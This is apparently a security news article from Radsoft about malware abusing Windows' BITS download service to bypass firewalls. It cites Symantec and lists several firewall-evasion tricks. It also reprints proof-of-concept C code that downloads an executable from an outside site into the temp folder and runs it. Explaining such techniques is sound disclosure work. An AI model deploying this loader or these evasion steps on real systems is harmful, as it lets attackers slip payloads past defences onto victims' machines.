About | Buy Stuff | News | Products | Rants | Search | Security | Twitter
Home » News » Roundups

Blowing Microsoft's BITS to Bits

There's a new one and it's a killer: it's namely possible to compromise Microsoft's own automatic update system to inject malicious code onto a Windows system - and to date there is no known cure or workaround, making it all the more lethal.


Get It

Try It

'When programmers and OS designers introduce new functionalities in their products they should always consider who is going to use this', writes Elia Florio of Symantec who goes on to cite similar examples of computer science naïvety in alternate data streams and encrypted file systems, both of which are exploited successfully in Backdoor.Rustock and Trojan.Linkoptimizer.

And now there's a new one and it's a killer: it's namely possible to compromise Microsoft's own automatic update system to inject malicious code onto a Windows system - and to date there is no known cure or workaround, making it all the more lethal*.

Frank Boldewin came upon such a trojan in March of this year; now he's released a proof of concept which shows how easily it can be done. For his part Florio adds that the technique was found well documented in the underground at the end of 2006 and described there as an 'anti-firewall loader'.

The technique exploits a Microsoft 'technology' known as BITS or background intelligent transfer service. It's used by Windows Update, Windows Server Update Services, Microsoft Systems Management Server, and by Microsoft Instant Messenger. It's an asynchronous download service that runs in the background and is capable of resuming downloads after system crashes, hangs, and reboots. It supports HTTP and can be programmed via the Microsoft COM API.

But BITS is considered part of the system proper and as such will normally get past firewall restrictions. Downloads arranged by malware through BITS are actually run by Windows itself and are therefore not suspect - and even if one was aware of this potential attack there would be little one could do: it's not exactly easy to keep an eye on what BITS is downloading and/or determine what is kosher and what is not.

Bypassing security on the way in is often the easiest part of the task: techniques can be updated continually to take advantage of new weaknesses in the system; and some firewalls are notorious for not implementing proper packet level filtering.

Further, there exist a plethora of simplistic hacks to defeat even more sophisticated systems.

  • Run a process with an infinite loop that finds firewall alert windows and dismisses them with 'yes'/'accept' responses before they even appear on screen.
  • Kill the firewall process and then go into the Registry and shut down its automatic startup.
  • Inject code into trusted Svchost processes.
  • Inject malicious code into Internet Explorer (if there's room left).
  • Compromise the communications drivers most firewalls are dependent on.

When you have a system with no basic security model the possibilities are endless.

Following is the salient code from Boldewin's POC. It accesses BITS through the COM API, gets the payload from Boldewin's own site, places it in the user's temporary directory, and runs it.

int main() {
    GUID jobid; HRESULT hresult;
    IBackgroundCopyJob *bgcopyjob;
    IBackgroundCopyManager *bgcopyman;

    WCHAR jobname[] = L"leeching_job";
    WCHAR source[] = L"http://reconstructer.org/fwbypassalert";
    WCHAR target[MAX_PATH + 20] = L"", tmppath[MAX_PATH];
    char exec[MAX_PATH + 20] = "";

    GetTempPathW(MAX_PATH, tmppath);
    swprintf(target, L"%s\\fwbypassalert.exe", tmppath);
    WideCharToMultiByte(CP_ACP, 0, (const unsigned short *) target,
            MAX_PATH + 20, exec, MAX_PATH + 20, 0, 0);

    if (SUCCEEDED(hresult = CoInitializeEx(0, COINIT_APARTMENTTHREADED)))
        hresult = CoInitializeSecurity(0, -1, 0, 0, RPC_C_AUTHN_LEVEL_CONNECT,
                RPC_C_IMP_LEVEL_IMPERSONATE, 0, EOAC_NONE, 0);
    else
        return -1;

    if (SUCCEEDED(hresult))
        hresult = CoCreateInstance(CLSID_BackgroundCopyManager, 0, CLSCTX_ALL,
                IID_IBackgroundCopyManager, (LPVOID *) &bgcopyman);
    else
        return -1;

    if (hresult == S_OK) {
        if ((hresult = bgcopyman->CreateJob(jobname, BG_JOB_TYPE_DOWNLOAD, &jobid,
                &bgcopyjob)) == S_OK) {
            if ((hresult = bgcopyjob->AddFile(source,target)) == S_OK) {
                BG_JOB_STATE state;

                bgcopyjob->Resume();

                do {
                    Sleep(100); bgcopyjob->GetState(&state);
                } while (state != BG_JOB_STATE_TRANSFERRED);

                bgcopyjob->Complete(); WinExec(exec, SW_SHOW);
            }
            bgcopyjob->Release();
        }
        bgcopyman->Release();
    }

    CoUninitialize(); return 0;
}

*Other than getting a grip and abandoning Windows.

See Also
Symantec: Malware Update with Windows Update

About | Buy Stuff | News | Products | Rants | Search | Security
Copyright © Radsoft. All rights reserved.